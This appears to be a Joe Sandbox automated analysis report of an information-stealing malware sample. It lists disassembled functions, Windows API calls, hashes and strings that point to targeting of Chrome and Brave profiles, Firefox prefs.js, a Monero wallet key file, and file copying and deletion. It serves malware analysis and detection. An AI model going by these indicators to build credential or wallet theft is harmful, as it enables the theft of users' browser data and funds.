                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                  • String ID: --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$Brave$Google Chrome$Preferences$\Brave\Preferences
                                  • API String ID: 3334442632-1869280968
                                  • Opcode ID: 9c77fc0a416041900065266834fbe0b7643a41c3a1b044c10ee6e39210588322
                                  • Instruction ID: 5a64bbfff8fcbc003a586c8df078b7464152c7a7e2fe57b937513b7ea00b9a63
                                  • Opcode Fuzzy Hash: 9c77fc0a416041900065266834fbe0b7643a41c3a1b044c10ee6e39210588322
                                  • Instruction Fuzzy Hash: A85210B291010C5BCB54FBA0DD96FFE737EAF54304F40459DB50A66191EE30AB48CBAA
                                  Function 006C3B00 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • wsprintfA.USER32 ref: 006C3B1C
                                  • FindFirstFileA.KERNEL32(?,?), ref: 006C3B33
                                  • lstrcat.KERNEL32(?,?), ref: 006C3B85
                                  • StrCmpCA.SHLWAPI(?,006D0F58), ref: 006C3B97
                                  • StrCmpCA.SHLWAPI(?,006D0F5C), ref: 006C3BAD
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 006C3EB7
                                  • FindClose.KERNEL32(000000FF), ref: 006C3ECC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                  • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                  • API String ID: 1125553467-2524465048
                                  • Opcode ID: e8e9dd17a4656230bbdc6ba843a1b9aeba53762d333b331278f012c266ba5ae3
                                  • Instruction ID: 4d1376953473026115d4f62f0719afa94ca23e757a325ffcb4cc6207d7ccdb6b
                                  • Opcode Fuzzy Hash: e8e9dd17a4656230bbdc6ba843a1b9aeba53762d333b331278f012c266ba5ae3
                                  • Instruction Fuzzy Hash: CDA130B2A142189BDB74DFA4DC85FFAB379EB48300F54858DB60D96281DB709B84CF61
                                  Function 006C4B60 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • wsprintfA.USER32 ref: 006C4B7C
                                  • FindFirstFileA.KERNEL32(?,?), ref: 006C4B93
                                  • StrCmpCA.SHLWAPI(?,006D0FC4), ref: 006C4BC1
                                  • StrCmpCA.SHLWAPI(?,006D0FC8), ref: 006C4BD7
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 006C4DCD
                                  • FindClose.KERNEL32(000000FF), ref: 006C4DE2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseFirstNextwsprintf
                                  • String ID: %s\%s$%s\%s$%s\*
                                  • API String ID: 180737720-445461498
                                  • Opcode ID: afc5fd0998d5176d0dc1e7384589db28b8bf4069c2c95e58d840e1176c6f6d41
                                  • Instruction ID: 6ee3e6885fe5cf017a05c1d3a7141425b5d45e17a218fd454c775b380e3a2ce4
                                  • Opcode Fuzzy Hash: afc5fd0998d5176d0dc1e7384589db28b8bf4069c2c95e58d840e1176c6f6d41
                                  • Instruction Fuzzy Hash: 7E614AB2914118ABDB20EBE0DC95FEAB37DEB48700F40458DF60A96151EF70EB849F95
                                  Function 006C47C0 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 006C47D0
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 006C47D7
                                  • wsprintfA.USER32 ref: 006C47F6
                                  • FindFirstFileA.KERNEL32(?,?), ref: 006C480D
                                  • StrCmpCA.SHLWAPI(?,006D0FAC), ref: 006C483B
                                  • StrCmpCA.SHLWAPI(?,006D0FB0), ref: 006C4851
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 006C48DB
                                  • FindClose.KERNEL32(000000FF), ref: 006C48F0
                                  • lstrcat.KERNEL32(?,0147E988), ref: 006C4915
                                  • lstrcat.KERNEL32(?,0147DC40), ref: 006C4928
                                  • lstrlen.KERNEL32(?), ref: 006C4935
                                  • lstrlen.KERNEL32(?), ref: 006C4946
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                  • String ID: %s\%s$%s\*
                                  • API String ID: 671575355-2848263008
                                  • Opcode ID: ae91174808f7178a3cd8e74856ce74056fb9fae91e5db86ecb7021f2ac4b7b75
                                  • Instruction ID: 3df6a50165de8e1d96d7d69e8ddc77e73e83ae1ed3f4d1ea5abb6b05f3c16f53
                                  • Opcode Fuzzy Hash: ae91174808f7178a3cd8e74856ce74056fb9fae91e5db86ecb7021f2ac4b7b75
                                  • Instruction Fuzzy Hash: 565175B1914218ABC760EBB0DC99FE9B37DEB58300F40458CB60996250EE74DB84DFA1
                                  Function 006C40F0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • wsprintfA.USER32 ref: 006C4113
                                  • FindFirstFileA.KERNEL32(?,?), ref: 006C412A
                                  • StrCmpCA.SHLWAPI(?,006D0F94), ref: 006C4158
                                  • StrCmpCA.SHLWAPI(?,006D0F98), ref: 006C416E
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 006C42BC
                                  • FindClose.KERNEL32(000000FF), ref: 006C42D1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseFirstNextwsprintf
                                  • String ID: %s\%s
                                  • API String ID: 180737720-4073750446
                                  • Opcode ID: e2e3127b895898e96dab90b3227c46ab4bb4e9a9bbb634a61f8a1b4bb7a32354
                                  • Instruction ID: 050d92354585af3234659e8134717855b0c04a87a27c753730caa7956344e1e2
                                  • Opcode Fuzzy Hash: e2e3127b895898e96dab90b3227c46ab4bb4e9a9bbb634a61f8a1b4bb7a32354
                                  • Instruction Fuzzy Hash: 515184B2914218ABCB24EBB0DC95FFAB37DFB48300F00458DB61A96150EB74EB848F54
                                  Function 006BEE20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • wsprintfA.USER32 ref: 006BEE3E
                                  • FindFirstFileA.KERNEL32(?,?), ref: 006BEE55
                                  • StrCmpCA.SHLWAPI(?,006D1630), ref: 006BEEAB
                                  • StrCmpCA.SHLWAPI(?,006D1634), ref: 006BEEC1
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 006BF3AE
                                  • FindClose.KERNEL32(000000FF), ref: 006BF3C3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseFirstNextwsprintf
                                  • String ID: %s\*.*
                                  • API String ID: 180737720-1013718255
                                  • Opcode ID: 9ca8bac4c412a3069332fcd14c933ff70c5d4ce00913aca8b2c61c4e8e3a7b89
                                  • Instruction ID: 6359393b02f0eb954a65662a963a5d185e885cefaa2f36e6debcf44e59920bc9
                                  • Opcode Fuzzy Hash: 9ca8bac4c412a3069332fcd14c933ff70c5d4ce00913aca8b2c61c4e8e3a7b89
                                  • Instruction Fuzzy Hash: D9E1EE7291111C5ADB94EBA0DCA2FFE733AAF54304F4045DDB50A62152EE30AF89CF59
                                  Function 006F0098 Relevance: 17.4, Strings: 13, Instructions: 1151COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 2-by$2-by$2-byexpa$expa$expa$expand 3$expand 32-by$nd 3$nd 32-by$te k$te k$te k$te knd 3expand 32-by
                                  • API String ID: 0-1562099544
                                  • Opcode ID: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
                                  • Instruction ID: 6e9e8b619082839fc2598f149eda27dab5dc0eba28c400e653c58197c446e622
                                  • Opcode Fuzzy Hash: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
                                  • Instruction Fuzzy Hash: 57E276B09083808FD7A4CF29C580B8BFBE1BFC8354F51892EE99997211D770A959CF56
                                  Function 006BF7B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 006CAA50: lstrcpy.KERNEL32(006D0E1A,00000000), ref: 006CAA98
                                    • Part of subcall function 006CAC30: lstrcpy.KERNEL32(00000000,?), ref: 006CAC82
                                    • Part of subcall function 006CAC30: lstrcat.KERNEL32(00000000), ref: 006CAC92
                                    • Part of subcall function 006CACC0: lstrlen.KERNEL32(?,01478F58,?,\Monero\wallet.keys,006D0E1A), ref: 006CACD5
                                    • Part of subcall function 006CACC0: lstrcpy.KERNEL32(00000000), ref: 006CAD14
                                    • Part of subcall function 006CACC0: lstrcat.KERNEL32(00000000,00000000), ref: 006CAD22
                                    • Part of subcall function 006CABB0: lstrcpy.KERNEL32(?,006D0E1A), ref: 006CAC15
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,006D16B0,006D0D97), ref: 006BF81E
                                  • StrCmpCA.SHLWAPI(?,006D16B4), ref: 006BF86F
                                  • StrCmpCA.SHLWAPI(?,006D16B8), ref: 006BF885
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 006BFBB1
                                  • FindClose.KERNEL32(000000FF), ref: 006BFBC3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                  • String ID: prefs.js
                                  • API String ID: 3334442632-3783873740
                                  • Opcode ID: 5a2de7d7be70258b3be4e122fc28d609aab599087874901d805ced85cedbb5fc
                                  • Instruction ID: 672f3c79ee419e7b8cbb3d6590ae1471831e4a6e3961bb9b3fdc1121313291fb
                                  • Opcode Fuzzy Hash: 5a2de7d7be70258b3be4e122fc28d609aab599087874901d805ced85cedbb5fc
                                  • Instruction Fuzzy Hash: A4B12071A101189BCB64FBA0DDA6FFD737AEF54304F0085ADA50A56191EF30AB48CB96
                                  Function 006B1710 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 006CAA50: lstrcpy.KERNEL32(006D0E1A,00000000), ref: 006CAA98
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,006D523C,?,?,?,006D52E4,?,?,00000000,?,00000000), ref: 006B1963
                                  • StrCmpCA.SHLWAPI(?,006D538C), ref: 006B19B3
                                  • StrCmpCA.SHLWAPI(?,006D5434), ref: 006B19C9
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 006B1D80
                                  • DeleteFileA.KERNEL32(00000000), ref: 006B1E0A
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 006B1E60
                                  • FindClose.KERNEL32(000000FF), ref: 006B1E72
                                    • Part of subcall function 006CAC30: lstrcpy.KERNEL32(00000000,?), ref: 006CAC82
                                    • Part of subcall function 006CAC30: lstrcat.KERNEL32(00000000), ref: 006CAC92
                                    • Part of subcall function 006CACC0: lstrlen.KERNEL32(?,01478F58,?,\Monero\wallet.keys,006D0E1A), ref: 006CACD5
                                    • Part of subcall function 006CACC0: lstrcpy.KERNEL32(00000000), ref: 006CAD14
                                    • Part of subcall function 006CACC0: lstrcat.KERNEL32(00000000,00000000), ref: 006CAD22
                                    • Part of subcall function 006CABB0: lstrcpy.KERNEL32(?,006D0E1A), ref: 006CAC15
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                  • String ID: \*.*
                                  • API String ID: 1415058207-1173974218
                                  • Opcode ID: aaaa040bdbe6bd7897b28b18e81591781d6f06411aefcc15e7652d432a535209
                                  • Instruction ID: 4fd8495a0f4724b5513f27ed4cfe655ad7c8e89bb7627e36b43e20013b30c717
                                  • Opcode Fuzzy Hash: aaaa040bdbe6bd7897b28b18e81591781d6f06411aefcc15e7652d432a535209
                                  • Instruction Fuzzy Hash: 7C12A77191011CABCB59EBA0DCA6FFE737AEF54304F4045DDA10A66191EE30AF88CB65
                                  Function 006BDF10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 006CAA50: lstrcpy.KERNEL32(006D0E1A,00000000), ref: 006CAA98
                                    • Part of subcall function 006CACC0: lstrlen.KERNEL32(?,01478F58,?,\Monero\wallet.keys,006D0E1A), ref: 006CACD5
